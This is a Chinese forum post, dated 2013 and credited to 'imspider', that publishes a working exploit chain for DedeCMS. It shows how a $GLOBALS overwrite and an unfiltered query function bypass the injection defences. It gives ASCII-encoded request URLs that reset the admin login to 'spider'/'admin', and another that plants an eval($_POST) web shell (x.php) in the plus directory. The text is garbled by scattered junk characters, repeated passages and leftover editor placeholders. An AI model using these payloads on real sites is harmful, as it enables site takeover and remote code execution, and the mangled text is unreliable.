|
|
此漏洞无视gpc转义,过80sec注入防御。
& _ B8 b8 [& R% i8 \补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
% c5 |7 e; z# I/ G起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
+ W$ n2 F) {7 H, L- s+ Yinclude/dedesql.class.php( s( w5 {3 k9 Z$ r% \- s( T
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。- V+ T- S1 ]& S' }: d, i5 B8 L1 l
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2% x: I( o6 B+ n5 ]8 A9 e
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。" e7 ^2 V K7 @0 E S
plus/download.php
& l- z w9 a; qelse if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
' h8 D8 q" @% T# K8 u! v+ ~7 [$ l/ s7 Hadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:1 d- A$ M& l3 K, s
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:. V+ D Z" T4 o# [
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin. W: W9 c; }: {1 t! m5 e% Q( U
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。% B4 ~' W. e* J: U- r N
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
+ u2 d! D, ^, ]8 j* l/ w9 G" XUPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。6 f3 e: q" B ?+ V3 A& y
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
( M, C( B& v( Y- E; S' |起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
. i0 j0 X: a8 X3 F+ A8 Binclude/dedesql.class.php0 e W" ]5 s9 w7 R
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。# \& }# T+ V$ f: \# Y1 n
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
3 h& g6 ]0 W \. K" | h而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。 y8 R% K8 X+ |1 n7 ]
plus/download.php1 T4 w, z/ k: a3 \0 H* s4 R
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):' D& ^9 p+ U( ^& h2 b3 s
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
& @3 z6 u, f% _/ ^" [UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
$ a1 y C6 X( T8 nhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin; Q$ `- L" ~6 @
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。% H9 g, E4 t1 |, x& G* ^. Y
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
3 T @0 d. `) ^+ E. a, b3 Y___FCKpd___6getshell:
. m- H5 P* v4 P+ o. U2 v+ `3 a' dhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m
- H) z5 _3 F4 a/ R& shttp://127.0.0.1/plus/x.php# {* ~: @8 L7 s# c
update成功后还要访问下 /plus/mytag_js.php?aid=1
0 I8 j1 O% ^. ^& e5 Q失败原因:
; z% V5 u+ A+ O测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
) A* }% U) S+ Q配图:& C( ^1 L% p! B+ T7 U/ i
1.查看dede当前版本9 S- y5 s# n4 Y% q& e
0 q1 F" A+ g1 S$ i7 Q
2.执行exp
# w8 M/ L: z" Q3 F% Q! D R" P3 s, B0 p
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
5 h5 I& i1 P" d( z, \7 L% i0 O* r( h% g3 V* h5 P
spider密码admin
# z' Y' `4 y3 S; _+ ]* A+ z) I& B! S @5 H8 o+ j8 {
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png3 `: j& C& O7 [% ^7 K
原作者:imspider: ^$ ?8 }1 v3 y* z
5 {5 Y8 S1 ?( f3 ~! {* x$ H4 Z本博客测试+配图+getshell
( L5 I" H, Y( x6 D S9 R' S: MPOST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT & u, W- q3 @7 A) Q+ p2 j; \) r
1 k; x/ \! Q9 k8 ?# |
getshell:% f- A+ q& x1 }, x
___FCKpd___7会在plus目录生成 x.php 密码 m) z4 M8 o! z, J2 d% |
http://127.0.0.1/plus/x.php
. P, A5 |) O6 j* i* z7 X4 Nupdate成功后还要访问下 /plus/mytag_js.php?aid=1
: {3 h# b8 ~* d/ ]! o0 e失败原因:
. s: O# J3 K! k& L: n测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
- m( m7 C- F! j V配图:; L# }6 M$ M6 W. {2 \+ P' ]* k( S9 h
1.查看dede当前版本
, ]; A- \) R0 I n: Qhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png) T6 |8 W! a# c' A1 q. c/ d
2.执行exp0 C6 W: n2 y) [6 t2 ]
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
" s' @& `$ m9 ~; Lspider密码admin3 M8 t6 `5 T* I% F4 b
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png) P8 z p( D$ A/ {: A% W2 T6 A
' W9 V8 I) T z: R L1 M0 Z |
|
发表于 2013-9-21 16:08:21
收藏
支持
反对